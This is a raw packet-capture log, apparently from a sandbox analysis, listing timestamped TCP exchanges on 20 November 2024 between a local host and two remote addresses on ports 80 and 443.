                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.216253042 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.220870972 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.220870972 CET49752443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.220897913 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.220907927 CET4434975213.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.226383924 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.226391077 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.226414919 CET49751443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.226418972 CET4434975113.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.269579887 CET49674443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.269586086 CET49673443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.286834002 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.286883116 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.286983967 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.302777052 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.302798986 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.306185007 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.306286097 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.306381941 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.306885004 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.306922913 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.409200907 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.409290075 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.437792063 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.442640066 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.582087994 CET49672443192.168.2.6173.222.162.64
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654794931 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654835939 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654869080 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654894114 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654894114 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654928923 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654941082 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654966116 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654977083 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.654999971 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655014038 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655038118 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655047894 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655102968 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655781031 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655817986 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655838966 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655853987 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655865908 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655889034 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655909061 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655927896 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655940056 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.655978918 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.760646105 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.761303902 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.761320114 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.761833906 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.761840105 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781219959 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781260014 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781287909 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781296968 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781313896 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781349897 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781426907 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781461954 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781481028 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781496048 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781513929 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781532049 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781543970 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781565905 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781582117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.781625032 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782217026 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782250881 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782274008 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782286882 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782303095 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782322884 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782336950 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782377958 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782823086 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782855988 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782885075 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782891989 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782928944 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782951117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.782978058 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783013105 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783035040 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783067942 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783878088 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783972979 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.783987045 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784019947 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784037113 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784055948 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784070015 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784091949 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784137964 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784159899 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784647942 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784694910 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784934044 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.784991980 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.788439989 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.789141893 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.789160013 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.789901018 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.789910078 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.839930058 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.840667009 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.840678930 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.841517925 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.841522932 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865190983 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865246058 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865302086 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865648985 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865664959 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865674973 CET49753443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.865679979 CET4434975313.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.869220018 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.869262934 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.869385004 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.869594097 CET49758443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.869606972 CET4434975813.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891609907 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891742945 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891797066 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891880989 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891897917 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891908884 CET49754443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.891916990 CET4434975413.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.894958973 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.895052910 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.895144939 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.895426035 CET49759443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.895462036 CET4434975913.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906266928 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906306982 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906342983 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906373024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906377077 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906397104 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906413078 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906466007 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906471014 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906512976 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906512976 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906761885 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906893015 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906918049 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906951904 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906985998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.906994104 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907012939 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907078028 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907274008 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907308102 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907331944 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907357931 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907358885 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907392025 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907413960 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907426119 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907463074 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907486916 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.907939911 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908056021 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908071995 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908104897 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908140898 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908159971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908159971 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908174038 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908185005 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908210039 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908229113 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908272982 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908953905 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.908987999 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909024000 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909046888 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909046888 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909074068 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909136057 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909171104 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909193039 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909204960 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909260988 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.909260988 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910043955 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910079956 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910116911 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910120010 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910132885 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910204887 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910239935 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910267115 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910267115 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910275936 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910293102 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.910331011 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911046028 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911081076 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911113024 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911117077 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911134005 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911150932 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911196947 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911205053 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911209106 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911242962 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911298037 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911298037 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911859035 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911894083 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911930084 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.911963940 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912024975 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912060022 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912096024 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912107944 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912107944 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912130117 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912143946 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912177086 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912853003 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.912916899 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.958085060 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.958868027 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.958882093 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.959569931 CET49756443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.959575891 CET4434975613.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.959739923 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.959916115 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.960036993 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.960166931 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.960180044 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.960194111 CET49755443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.960199118 CET4434975513.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.964380980 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.964438915 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.964504957 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.964932919 CET49760443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.964951992 CET4434976013.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.974889994 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.975449085 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.975496054 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.976058006 CET49757443192.168.2.613.107.246.45
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:20.976073980 CET4434975713.107.246.45192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.030913115 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.030956030 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.030992031 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031029940 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031196117 CET4974280192.168.2.6185.215.113.206
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031599998 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031632900 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031668901 CET8049742185.215.113.206192.168.2.6
                                                                                                                                                                                                                                                                                      Nov 20, 2024 10:54:21.031682014 CET4974280192.168.2.6185.215.113.206
